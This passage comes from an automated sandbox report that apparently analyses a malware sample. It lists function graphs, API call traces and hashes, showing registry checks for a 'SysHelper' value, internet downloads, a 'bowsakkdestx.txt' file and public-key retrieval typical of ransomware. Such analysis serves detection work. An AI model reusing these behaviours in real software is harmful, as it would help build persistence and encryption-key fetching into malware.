                                                                                                          • Part of subcall function 00F3FE47: __lock.LIBCMT ref: 00F3FE6C
                                                                                                          • Part of subcall function 00F3FE47: ____lc_codepage_func.LIBCMT ref: 00F3FEB3
                                                                                                          • Part of subcall function 00F3FE47: __getenv_helper_nolock.LIBCMT ref: 00F3FED4
                                                                                                          • Part of subcall function 00F3FE47: _free.LIBCMT ref: 00F3FF07
                                                                                                          • Part of subcall function 00F3FE47: _strlen.LIBCMT ref: 00F3FF0E
                                                                                                          • Part of subcall function 00F3FE47: __malloc_crt.LIBCMT ref: 00F3FF15
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __lock$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__malloc_crt__mtinitlocknum__tzset_nolock_free_strlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 1282695788-0
                                                                                                        • Opcode ID: e42d93314165367f1656a7e2447554fa6aac77b9bff0b494491b7d06ea31e65a
                                                                                                        • Instruction ID: 7fd4a3244a8dcfdee980f4215b7d17ca50f3c98dc22e8485661366ed51d645d0
                                                                                                        • Opcode Fuzzy Hash: e42d93314165367f1656a7e2447554fa6aac77b9bff0b494491b7d06ea31e65a
                                                                                                        • Instruction Fuzzy Hash: 5EE08C75D4038ADAEA70BBB0DD46318B120AB40332F249119F050101C68FFC0189EB22
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F37B0B Relevance: 3.0, APIs: 2, Instructions: 7COMMONLIBRARYCODE
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1074 f37b0b-f37b1a call f37ad7 ExitProcess
                                                                                                        APIs
                                                                                                        • ___crtCorExitProcess.LIBCMT ref: 00F37B11
                                                                                                          • Part of subcall function 00F37AD7: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,00F37B16,00F33B69,?,00F38BCA,000000FF,0000001E,01017BD0,00000008,00F38B0E,00F33B69,00F33B69), ref: 00F37AE6
                                                                                                          • Part of subcall function 00F37AD7: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 00F37AF8
                                                                                                        • ExitProcess.KERNEL32 ref: 00F37B1A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                        • String ID:
                                                                                                        • API String ID: 2427264223-0
                                                                                                        • Opcode ID: 2904aa0deadc30ac9f38701a82b55f6b01a56bab67d98831f369164cb8ac78d2
                                                                                                        • Instruction ID: 24376b462199e819c4e77428f1fdd948c982f029138fd4cf921681f6be0dd6ae
                                                                                                        • Opcode Fuzzy Hash: 2904aa0deadc30ac9f38701a82b55f6b01a56bab67d98831f369164cb8ac78d2
                                                                                                        • Instruction Fuzzy Hash: 79B0923000920CBBCF063F61DC0A85D3F2AEB003A2F008025F90408031EB76AA91AAD0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F37F3D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1077 f37f3d-f37f47 call f37e0e 1079 f37f4c-f37f50 1077->1079
                                                                                                        APIs
                                                                                                        • _doexit.LIBCMT ref: 00F37F47
                                                                                                          • Part of subcall function 00F37E0E: __lock.LIBCMT ref: 00F37E1C
                                                                                                          • Part of subcall function 00F37E0E: DecodePointer.KERNEL32(01017B08,0000001C,00F37CFB,00F33B69,00000001,00000000,?,00F37C49,000000FF,?,00F38B1A,00000011,00F33B69,?,00F350D7,0000000D), ref: 00F37E5B
                                                                                                          • Part of subcall function 00F37E0E: DecodePointer.KERNEL32(?,00F37C49,000000FF,?,00F38B1A,00000011,00F33B69,?,00F350D7,0000000D), ref: 00F37E6C
                                                                                                          • Part of subcall function 00F37E0E: EncodePointer.KERNEL32(00000000,?,00F37C49,000000FF,?,00F38B1A,00000011,00F33B69,?,00F350D7,0000000D), ref: 00F37E85
                                                                                                          • Part of subcall function 00F37E0E: DecodePointer.KERNEL32(-00000004,?,00F37C49,000000FF,?,00F38B1A,00000011,00F33B69,?,00F350D7,0000000D), ref: 00F37E95
                                                                                                          • Part of subcall function 00F37E0E: EncodePointer.KERNEL32(00000000,?,00F37C49,000000FF,?,00F38B1A,00000011,00F33B69,?,00F350D7,0000000D), ref: 00F37E9B
                                                                                                          • Part of subcall function 00F37E0E: DecodePointer.KERNEL32(?,00F37C49,000000FF,?,00F38B1A,00000011,00F33B69,?,00F350D7,0000000D), ref: 00F37EB1
                                                                                                          • Part of subcall function 00F37E0E: DecodePointer.KERNEL32(?,00F37C49,000000FF,?,00F38B1A,00000011,00F33B69,?,00F350D7,0000000D), ref: 00F37EBC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Pointer$Decode$Encode$__lock_doexit
                                                                                                        • String ID:
                                                                                                        • API String ID: 2158581194-0
                                                                                                        • Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                                        • Instruction ID: 97ccff28d8c60aa48329d1f1fadcbdcda5dcda6d069775e124362c29f2f1224e
                                                                                                        • Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                                        • Instruction Fuzzy Hash: AFB012B198430C33DA213642EC03F053B0C4740B60F200070FA0C1C1E1A593B9A050C9
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Non-executed Functions

                                                                                                        Function 00F91920 Relevance: 121.3, APIs: 41, Strings: 28, Instructions: 587libraryloaderCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1307 f91920-f919e0 call f3f7c0 GetVersionExA LoadLibraryA * 3 1310 f91a0b-f91a0d 1307->1310 1311 f919e2-f91a05 GetProcAddress * 2 1307->1311 1312 f91aba-f91ac2 1310->1312 1313 f91a13-f91a15 1310->1313 1311->1310 1315 f91acb-f91ad3 1312->1315 1316 f91ac4-f91ac5 FreeLibrary 1312->1316 1313->1312 1314 f91a1b-f91a31 1313->1314 1321 f91a69-f91a85 1314->1321 1322 f91a33-f91a5d call f3f7c0 call f6d550 1314->1322 1317 f91b0d 1315->1317 1318 f91ad5-f91b0b GetProcAddress * 3 1315->1318 1316->1315 1320 f91b0f-f91b17 1317->1320 1318->1320 1323 f91c0a-f91c12 1320->1323 1324 f91b1d-f91b23 1320->1324 1321->1312 1338 f91a87-f91aae call f3f7c0 call f6d550 1321->1338 1322->1321 1326 f91c1b-f91c22 1323->1326 1327 f91c14-f91c15 FreeLibrary 1323->1327 1324->1323 1328 f91b29-f91b2b 1324->1328 1330 f91c31-f91c44 LoadLibraryA 1326->1330 1331 f91c24-f91c2b call f649a0 1326->1331 1327->1326 1328->1323 1332 f91b31-f91b47 1328->1332 1336 f91d4b-f91d53 1330->1336 1337 f91c4a-f91c82 GetProcAddress * 3 1330->1337 1331->1330 1331->1336 1353 f91b49-f91b5d 1332->1353 1354 f91b98-f91bb4 1332->1354 1341 f91d59-f91e56 GetProcAddress * 12 1336->1341 1342 f9223f-f922cd call f92470 GlobalMemoryStatus call f3f7c0 call f6d550 GetCurrentProcessId call f3f7c0 call f6d550 call f3a77e 1336->1342 1343 f91caf-f91cb7 1337->1343 1344 f91c84-f91cac call f3f7c0 call f6d550 1337->1344 1338->1312 1351 f91e5c-f91e63 1341->1351 1352 f92233-f92239 FreeLibrary 1341->1352 1348 f91cb9-f91cc0 1343->1348 1349 f91d06-f91d08 1343->1349 1344->1343 1359 f91ccb-f91ccd 1348->1359 1360 f91cc2-f91cc9 1348->1360 1357 f91d0a-f91d3c call f3f7c0 call f6d550 1349->1357 1358 f91d3f-f91d45 FreeLibrary 1349->1358 1351->1352 1362 f91e69-f91e70 1351->1362 1352->1342 1371 f91b8a-f91b8c 1353->1371 1372 f91b5f-f91b84 call f3f7c0 call f6d550 1353->1372 1354->1323 1374 f91bb6-f91bca 1354->1374 1357->1358 1358->1336 1359->1349 1366 f91ccf-f91cde 1359->1366 1360->1349 1360->1359 1362->1352 1369 f91e76-f91e7d 1362->1369 1366->1349 1388 f91ce0-f91d03 call f3f7c0 call f6d550 1366->1388 1369->1352 1376 f91e83-f91e8a 1369->1376 1371->1354 1372->1371 1395 f91bfc-f91bfe 1374->1395 1396 f91bcc-f91bf6 call f3f7c0 call f6d550 1374->1396 1376->1352 1377 f91e90-f91e97 1376->1377 1377->1352 1384 f91e9d-f91ea4 1377->1384 1384->1352 1391 f91eaa-f91eb1 1384->1391 1388->1349 1391->1352 1399 f91eb7-f91ebe 1391->1399 1395->1323 1396->1395 1399->1352 1405 f91ec4-f91ecb 1399->1405 1405->1352 1410 f91ed1-f91ed3 1405->1410 1410->1352 1413 f91ed9-f91eea 1410->1413 1413->1352 1416 f91ef0-f91f01 1413->1416 1417 f91f03-f91f0f GetTickCount 1416->1417 1418 f91f15-f91f22 1416->1418 1417->1418 1420 f91f28-f91f2d 1418->1420 1421 f92081-f92093 1418->1421 1424 f91f33-f91f9d call f3f7c0 call f6d550 1420->1424 1422 f9209d-f920b2 1421->1422 1423 f92095-f92097 GetTickCount 1421->1423 1429 f9210a-f92116 1422->1429 1430 f920b4-f920f5 call f3f7c0 call f6d550 1422->1430 1423->1422 1440 f91f9f-f91faa 1424->1440 1441 f92015-f92060 1424->1441 1432 f92118-f9211a GetTickCount 1429->1432 1433 f92120-f92135 1429->1433 1430->1429 1452 f920f7-f920f9 1430->1452 1432->1433 1442 f92137 1433->1442 1443 f92196-f921a2 1433->1443 1445 f91fb0-f91feb call f3f7c0 call f6d550 1440->1445 1441->1421 1459 f92062-f92064 1441->1459 1448 f92140-f92181 call f3f7c0 call f6d550 1442->1448 1446 f921ac-f921c1 1443->1446 1447 f921a4-f921a6 GetTickCount 1443->1447 1476 f91fed-f91fef 1445->1476 1477 f9200f 1445->1477 1461 f92219-f92227 1446->1461 1462 f921c3-f92204 call f3f7c0 call f6d550 1446->1462 1447->1446 1448->1443 1475 f92183-f92185 1448->1475 1452->1430 1458 f920fb-f92108 GetTickCount 1452->1458 1458->1429 1458->1430 1466 f92079-f9207b 1459->1466 1467 f92066-f92077 GetTickCount 1459->1467 1464 f92229-f9222b 1461->1464 1465 f9222d CloseHandle 1461->1465 1462->1461 1483 f92206-f92208 1462->1483 1464->1352 1465->1352 1466->1421 1466->1424 1467->1421 1467->1466 1475->1448 1479 f92187-f92194 GetTickCount 1475->1479 1480 f91ff1-f92002 GetTickCount 1476->1480 1481 f92004-f9200d 1476->1481 1477->1441 1479->1443 1479->1448 1480->1477 1480->1481 1481->1445 1481->1477 1483->1462 1484 f9220a-f92217 GetTickCount 1483->1484 1484->1461 1484->1462
                                                                                                        APIs
                                                                                                        • GetVersionExA.KERNEL32(00000094), ref: 00F91983
                                                                                                        • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00F91994
                                                                                                        • LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 00F919A1
                                                                                                        • LoadLibraryA.KERNEL32(NETAPI32.DLL), ref: 00F919AE
                                                                                                        • GetProcAddress.KERNEL32(00000000,NetStatisticsGet), ref: 00F919E8
                                                                                                        • GetProcAddress.KERNEL32(?,NetApiBufferFree), ref: 00F919FB
                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00F91AC5
                                                                                                        • GetProcAddress.KERNEL32(?,CryptAcquireContextW), ref: 00F91ADB
                                                                                                        • GetProcAddress.KERNEL32(?,CryptGenRandom), ref: 00F91AEE
                                                                                                        • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00F91B01
                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00F91C15
                                                                                                        • LoadLibraryA.KERNEL32(USER32.DLL), ref: 00F91C36
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetForegroundWindow), ref: 00F91C50
                                                                                                        • GetProcAddress.KERNEL32(?,GetCursorInfo), ref: 00F91C63
                                                                                                        • GetProcAddress.KERNEL32(?,GetQueueStatus), ref: 00F91C76
                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00F91D45
                                                                                                        • GetProcAddress.KERNEL32(?,CreateToolhelp32Snapshot), ref: 00F91D73
                                                                                                        • GetProcAddress.KERNEL32(?,CloseToolhelp32Snapshot), ref: 00F91D86
                                                                                                        • GetProcAddress.KERNEL32(?,Heap32First), ref: 00F91D99
                                                                                                        • GetProcAddress.KERNEL32(?,Heap32Next), ref: 00F91DAC
                                                                                                        • GetProcAddress.KERNEL32(?,Heap32ListFirst), ref: 00F91DBF
                                                                                                        • GetProcAddress.KERNEL32(?,Heap32ListNext), ref: 00F91DD2
                                                                                                        • GetProcAddress.KERNEL32(?,Process32First), ref: 00F91DE5
                                                                                                        • GetProcAddress.KERNEL32(?,Process32Next), ref: 00F91DF8
                                                                                                        • GetProcAddress.KERNEL32(?,Thread32First), ref: 00F91E0B
                                                                                                        • GetProcAddress.KERNEL32(?,Thread32Next), ref: 00F91E1E
                                                                                                        • GetProcAddress.KERNEL32(?,Module32First), ref: 00F91E31
                                                                                                        • GetProcAddress.KERNEL32(?,Module32Next), ref: 00F91E44
                                                                                                        • GetTickCount.KERNEL32 ref: 00F91F03
                                                                                                        • GetTickCount.KERNEL32 ref: 00F91FF1
                                                                                                        • GetTickCount.KERNEL32 ref: 00F92066
                                                                                                        • GetTickCount.KERNEL32 ref: 00F92095
                                                                                                        • GetTickCount.KERNEL32 ref: 00F920FB
                                                                                                        • GetTickCount.KERNEL32 ref: 00F92118
                                                                                                        • GetTickCount.KERNEL32 ref: 00F92187
                                                                                                        • GetTickCount.KERNEL32 ref: 00F921A4
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$CountTick$Library$Load$Free$Version
                                                                                                        • String ID: $$ADVAPI32.DLL$CloseToolhelp32Snapshot$CreateToolhelp32Snapshot$CryptAcquireContextW$CryptGenRandom$CryptReleaseContext$GetCursorInfo$GetForegroundWindow$GetQueueStatus$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Intel Hardware Cryptographic Service Provider$KERNEL32.DLL$LanmanServer$LanmanWorkstation$Module32First$Module32Next$NETAPI32.DLL$NetApiBufferFree$NetStatisticsGet$Process32First$Process32Next$Thread32First$Thread32Next$USER32.DLL
                                                                                                        • API String ID: 842291066-1723836103
                                                                                                        • Opcode ID: e523015c4c89642283763829576395017a4b662ac68737ed8fba00411dca912a
                                                                                                        • Instruction ID: 0cfc96efacb8aeb276debaadf92bed526c885c4868cbd880247ad787918c4295
                                                                                                        • Opcode Fuzzy Hash: e523015c4c89642283763829576395017a4b662ac68737ed8fba00411dca912a
                                                                                                        • Instruction Fuzzy Hash: 5132BFB0E0022D9AEF619F68CC45B9EB7B9FF41714F0041EAA64CE6191EB758E80DF54
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F2E690 Relevance: 110.9, APIs: 54, Strings: 9, Instructions: 696stringnetworkfileCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1485 f2e690-f2e6d8 call f3f7c0 timeGetTime call f33f74 call f1c6a0 1492 f2e6e0-f2e6e6 1485->1492 1493 f2e6f0-f2e722 call f3b420 call f1c500 1492->1493 1498 f2e724-f2e729 1493->1498 1499 f2e72e-f2e772 InternetOpenW 1493->1499 1502 f2ea1f-f2ea40 call f33cf0 1498->1502 1500 f2e774-f2e776 1499->1500 1501 f2e778-f2e77d 1499->1501 1503 f2e78f-f2e7b8 call f25ae0 call f31c02 1500->1503 1504 f2e780-f2e789 1501->1504 1509 f2ea42-f2ea46 1502->1509 1510 f2ea8d-f2eacc lstrlenA lstrcpyA * 2 lstrlenA 1502->1510 1525 f2e882-f2e8e5 call f25ae0 call f23ff0 call f22900 call f259d0 1503->1525 1526 f2e7be-f2e7f7 call f24690 call f1dd40 1503->1526 1504->1504 1506 f2e78b-f2e78d 1504->1506 1506->1503 1512 f2ee2a-f2ee3a call f21b10 1509->1512 1513 f2ea4c-f2ea61 SHGetFolderPathA 1509->1513 1514 f2eace 1510->1514 1515 f2eaef-f2eb12 1510->1515 1533 f2ee3c-f2ee3f 1512->1533 1534 f2ee4d-f2ee82 call f1ef50 1512->1534 1513->1493 1517 f2ea67-f2ea88 PathAppendA DeleteFileA 1513->1517 1518 f2ead0-f2ead8 1514->1518 1521 f2eb14-f2eb16 1515->1521 1522 f2eb18-f2eb1f 1515->1522 1517->1493 1523 f2eada-f2eae7 lstrlenA 1518->1523 1524 f2eaeb 1518->1524 1528 f2eb2b-f2eb4f call f256d0 call f22900 1521->1528 1529 f2eb22-f2eb27 1522->1529 1523->1518 1531 f2eae9 1523->1531 1524->1515 1582 f2e8f3-f2e917 lstrcpyW 1525->1582 1583 f2e8e7-f2e8f0 call f32587 1525->1583 1554 f2e7f9-f2e7fe 1526->1554 1555 f2e86f-f2e874 1526->1555 1552 f2eb53-f2eb66 lstrcpyW 1528->1552 1553 f2eb51 1528->1553 1529->1529 1536 f2eb29 1529->1536 1531->1515 1533->1492 1545 f2ee86-f2ee8c 1534->1545 1536->1528 1549 f2ee92-f2ee94 1545->1549 1550 f2ee8e-f2ee90 1545->1550 1560 f2ee97-f2ee9c 1549->1560 1558 f2eea0-f2eeaf call f23ea0 1550->1558 1561 f2eb74-f2ebe4 lstrlenA call f30c62 call f3b420 MultiByteToWideChar lstrcpyW call f33cf0 1552->1561 1562 f2eb68-f2eb71 call f32587 1552->1562 1553->1552 1556 f2e800-f2e809 call f32587 1554->1556 1557 f2e80c-f2e827 1554->1557 1555->1525 1563 f2e876-f2e87f call f32587 1555->1563 1556->1557 1565 f2e842-f2e848 1557->1565 1566 f2e829-f2e82d 1557->1566 1558->1545 1584 f2eeb1-f2eee3 call f1ef50 1558->1584 1560->1560 1568 f2ee9e 1560->1568 1605 f2ebe6-f2ebea 1561->1605 1606 f2ec3d-f2ec97 lstrlenW lstrlenA lstrcpyA * 2 lstrlenA 1561->1606 1562->1561 1563->1525 1574 f2e84e-f2e86c 1565->1574 1566->1574 1575 f2e82f-f2e840 call f305a0 1566->1575 1568->1558 1574->1555 1575->1574 1588 f2e943-f2e97a InternetOpenUrlW InternetReadFile 1582->1588 1589 f2e919-f2e920 1582->1589 1583->1582 1604 f2eee7-f2eeed 1584->1604 1592 f2e9ec-f2ea08 InternetCloseHandle * 2 1588->1592 1593 f2e97c-f2e994 SHGetFolderPathA 1588->1593 1589->1588 1595 f2e922-f2e92e 1589->1595 1600 f2ea16-f2ea19 1592->1600 1601 f2ea0a-f2ea13 call f32587 1592->1601 1593->1592 1599 f2e996-f2e9c2 PathAppendA call f320b6 1593->1599 1602 f2e930-f2e935 1595->1602 1603 f2e937 1595->1603 1599->1592 1622 f2e9c4-f2e9e9 lstrlenA call f32b02 call f33a38 1599->1622 1600->1502 1601->1600 1609 f2e93c-f2e93d lstrcatW 1602->1609 1603->1609 1610 f2eef3-f2eef5 1604->1610 1611 f2eeef-f2eef1 1604->1611 1605->1512 1613 f2ebf0-f2ec11 SHGetFolderPathA 1605->1613 1615 f2ec99 1606->1615 1616 f2ecbf-f2ecdd 1606->1616 1609->1588 1612 f2eef8-f2eefd 1610->1612 1618 f2ef01-f2ef10 call f23ea0 1611->1618 1612->1612 1619 f2eeff 1612->1619 1613->1493 1620 f2ec17-f2ec38 PathAppendA DeleteFileA 1613->1620 1623 f2eca0-f2eca8 1615->1623 1624 f2ece3-f2eced 1616->1624 1625 f2ecdf-f2ece1 1616->1625 1618->1604 1633 f2ef12-f2ef4c call f23ff0 call f22900 1618->1633 1619->1618 1620->1492 1622->1592 1628 f2ecaa-f2ecb7 lstrlenA 1623->1628 1629 f2ecbb 1623->1629 1631 f2ecf0-f2ecf5 1624->1631 1630 f2ecf9-f2ed1b call f256d0 call f22900 1625->1630 1628->1623 1635 f2ecb9 1628->1635 1629->1616 1645 f2ed1f-f2ed35 lstrcpyW 1630->1645 1646 f2ed1d 1630->1646 1631->1631 1636 f2ecf7 1631->1636 1650 f2ef50-f2ef68 lstrcpyW 1633->1650 1651 f2ef4e 1633->1651 1635->1616 1636->1630 1648 f2ed43-f2edab lstrlenA call f30c62 call f3b420 MultiByteToWideChar lstrcpyW lstrlenW 1645->1648 1649 f2ed37-f2ed40 call f32587 1645->1649 1646->1645 1666 f2edbc-f2edc1 1648->1666 1667 f2edad-f2edb6 lstrlenW 1648->1667 1649->1648 1654 f2ef76-f2efb3 call f23ff0 call f22900 1650->1654 1655 f2ef6a-f2ef73 call f32587 1650->1655 1651->1650 1670 f2efb7-f2efc6 lstrcpyW 1654->1670 1671 f2efb5 1654->1671 1655->1654 1668 f2edc3-f2ede4 SHGetFolderPathA 1666->1668 1669 f2ee10-f2ee12 1666->1669 1667->1666 1672 f2ee44-f2ee48 1667->1672 1668->1493 1673 f2edea-f2ee0b PathAppendA DeleteFileA 1668->1673 1674 f2ee14-f2ee1a call f30bed 1669->1674 1675 f2ee1d-f2ee1f 1669->1675 1676 f2efd4-f2efe0 1670->1676 1677 f2efc8-f2efd1 call f32587 1670->1677 1671->1670 1678 f2f01a-f2f030 1672->1678 1673->1492 1674->1675 1675->1512 1680 f2ee21-f2ee27 call f30bed 1675->1680 1682 f2efe2-f2efeb call f32587 1676->1682 1683 f2efee-f2f008 1676->1683 1677->1676 1680->1512 1682->1683 1688 f2f016 1683->1688 1689 f2f00a-f2f013 call f32587 1683->1689 1688->1678 1689->1688
                                                                                                        APIs
                                                                                                        • timeGetTime.WINMM(?,?,?,?,?,00FDB3EC,000000FF), ref: 00F2E6C0
                                                                                                          • Part of subcall function 00F1C6A0: RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,?), ref: 00F1C6C2
                                                                                                          • Part of subcall function 00F1C6A0: RegQueryValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,?), ref: 00F1C6F3
                                                                                                          • Part of subcall function 00F1C6A0: RegCloseKey.ADVAPI32(00000000), ref: 00F1C700
                                                                                                        • _memset.LIBCMT ref: 00F2E707
                                                                                                          • Part of subcall function 00F1C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F1C51B
                                                                                                        • InternetOpenW.WININET ref: 00F2E743
                                                                                                        • _wcsstr.LIBCMT ref: 00F2E7AE
                                                                                                        • _memmove.LIBCMT ref: 00F2E838
                                                                                                        • lstrcpyW.KERNEL32(?,?), ref: 00F2E90A
                                                                                                        • lstrcatW.KERNEL32(?,&first=false), ref: 00F2E93D
                                                                                                        • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00F2E954
                                                                                                        • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00F2E96F
                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F2E98C
                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00F2E9A3
                                                                                                        • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 00F2E9CD
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00F2E9F3
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00F2E9F6
                                                                                                        • _strstr.LIBCMT ref: 00F2EA36
                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F2EA59
                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00F2EA74
                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00F2EA82
                                                                                                        • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 00F2EA92
                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00F2EAA4
                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00F2EABA
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00F2EAC8
                                                                                                        • lstrlenA.KERNEL32(00000022), ref: 00F2EAE3
                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00F2EB5B
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00F2EB7C
                                                                                                        • _malloc.LIBCMT ref: 00F2EB86
                                                                                                        • _memset.LIBCMT ref: 00F2EB94
                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 00F2EBAE
                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00F2EBB6
                                                                                                        • _strstr.LIBCMT ref: 00F2EBDA
                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F2EC00
